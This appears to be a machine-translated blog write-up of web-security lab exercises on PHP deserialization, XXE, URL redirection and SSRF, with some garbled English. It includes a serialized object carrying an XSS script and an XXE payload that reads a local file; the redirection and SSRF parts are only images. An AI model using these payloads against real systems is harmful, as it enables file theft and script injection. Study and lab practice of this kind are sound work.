php deserialization
Serialization serialize () is to an object can be transferred into a string, an object such as the following:
Deserialization to unserialize () it is to be reduced to a sequence of the target string, and then continue to use the following code.
Enter the code
O:1:"S":1:{s:4:"test";s:29:"<script>alert('aaa')</script>";}
xee Vulnerability
XXE, "xml external entity injection", that is "xml external entity injection vulnerability"
Submit a normal data
<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "ma"> ]> <name>&hacker;</name>
Submit malicious code
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://pig.txt"> ]> <x>&f;</x>
url redirection
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150056912-210569611.png)
Url will be replaced by another address
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150117475-1590811478.png)
ssrf(curl)
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150156997-1650587159.png)
Url is the problem, change the address directly
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150225472-366074439.png)
file_get_content
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150307660-107829911.png)
And almost on a direct path to change the line
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150324275-256981333.png)